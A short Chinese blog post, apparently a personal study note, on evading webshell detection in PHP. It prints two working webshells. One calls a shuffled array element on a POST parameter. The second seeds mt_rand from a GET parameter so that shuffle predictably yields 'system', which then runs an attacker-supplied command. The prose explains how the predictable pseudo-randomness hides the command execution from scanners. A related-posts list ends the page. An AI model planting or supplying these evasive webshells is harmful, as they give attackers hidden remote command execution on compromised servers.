记一次学习--webshell绕过(利用清洗函数)

目录

样本

样本修改


样本

php 复制代码
<?php
$a = array("t", "system");
shuffle($a);
$a[0]($_POST[1]);

通过 shuffle 函数打乱数组,然后通过$a[0]取出第一个元素,打乱后第一个元素可能是t也可能是system。然后再进行POST传参进行命令执行。

这里抓包可以正常执行

样本修改

对于shuffle函数来说,他的随机是伪随机,我们可以通过对其代码的分析然后预测数组中元素打乱的规律。对于sheuffle来说底层调用的是mt_rand来生成随机值,以次控制打乱的数组中的元素的顺序。然后对于mt_rand来说当他的种子定好他的随机值就不会发生改变了。

php 复制代码
<?php
$arr = array("t","a","s","system");
function shift(&$arr){
mt_srand($_GET[0]);
shuffle($arr);
}
shift($arr);
$arr[2]($_GET[1]);
相关推荐
charlie11451419119 分钟前
Git团队协作完全入门指南(上)
笔记·git·学习·教程·工程
迷茫的启明星24 分钟前
Git命令学习
git·学习
奋飞安全1 小时前
不让我用?这个真不能忍 - 某视频App强制启动
安全
全栈陈序员1 小时前
说说你对 Vue 的理解
前端·javascript·vue.js·学习·前端框架
im_AMBER1 小时前
Leetcode 85 【滑动窗口(不定长)】最多 K 个重复元素的最长子数组
c++·笔记·学习·算法·leetcode·哈希算法
nwsuaf_huasir2 小时前
overleaf在线编译latex怎办编译中文
学习
wdfk_prog2 小时前
[Linux]学习笔记系列 -- [fs]filesystems
linux·笔记·学习
jackaso2 小时前
react学习笔记
笔记·学习·react.js
像名字一样难取的昵称2 小时前
Linux学习笔记:十八、Linux文件的压缩,解压缩一站式学习
linux·运维·笔记·学习·ubuntu·ssh